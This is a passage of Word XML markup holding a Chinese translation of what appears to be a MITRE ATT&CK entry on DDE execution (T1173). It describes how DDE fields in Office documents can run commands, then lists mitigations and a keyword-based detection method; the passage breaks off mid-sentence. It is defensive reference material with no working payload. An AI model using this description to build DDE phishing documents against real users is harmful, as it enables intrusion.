          <w:p w14:paraId="5A5164EA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1173</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F99485C" w14:textId="5B82061B" w:rsidR="000F2665" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3679EC15" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E62A270" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>普通用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FEA776" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r>
              <w:t>, DLL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C6B2E9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46E80138" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E945859" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0E2361" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00654719" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态数据交换</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(DDE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种用于一次性或持续进程间通信（</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器协议。一旦连接被建立，应用可以匿名交换包括字符串、温数据链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据项变化时的通知</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、热数据链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据项变化的副本</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及命令执行请求在内的事务信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FF9EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00654719" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象链接与嵌入</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(OLE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者说链接不同文档中数据的能力原本是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现的。虽说正在被</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取代，</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能在</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows10</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和大多数微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office 2016</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中通过注册表启用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D41A6C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意者可能通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行任何命令，</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档可以直接或以嵌入文件的方式被</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令污染，并被用于通过钓鱼或上网投递可执行程序，避免使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Visual Basic</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(VBA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宏。</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00654719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以被黑客用于操作那些被攻陷但无法直接执行命令的机器上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06577C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="2384AAA9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5D56F701" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C4EBBB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="37195DA0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3393D203" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006419EB">
              <w:rPr>
                <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>应用隔离和沙箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48EC94E8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保受保护的视图已被启用。</w:t>
            </w:r>
            <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:history="1"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="4BFE920A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="632998B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="0056B3"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00050A61">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>终端行为防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD3A8C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows10</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上，启用攻击平面削减</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:t>ASR)</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>规则以防止</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DDE</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击以及通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>程序创建子进程的行为。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="0244C403" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="003568DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="4F7CAC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00050A61">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>禁用功能或删除程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C04E152" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以设置控制微软</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全特性的注册表项以禁用自动执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DDE/OLE</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。微软同时创建并默认开启了在</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Word</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Excel</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>软件中完全禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DDE</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行的注册表项。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="2AA63B4D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="232051F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="4F7CAC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00050A61">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>软件配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29F4AD39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑在一些</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>软件中禁用嵌入文件，比如像</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OneNote</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>那样样不支持保护视图的软件</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="463DB969" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FED313" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>OLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>开放的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>文件中扫描‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DDEAUTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>’、‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>’关键字，这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB74BE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>执行的标识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F46940" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DC0E28" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监控微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0E28">
        <w:rPr>
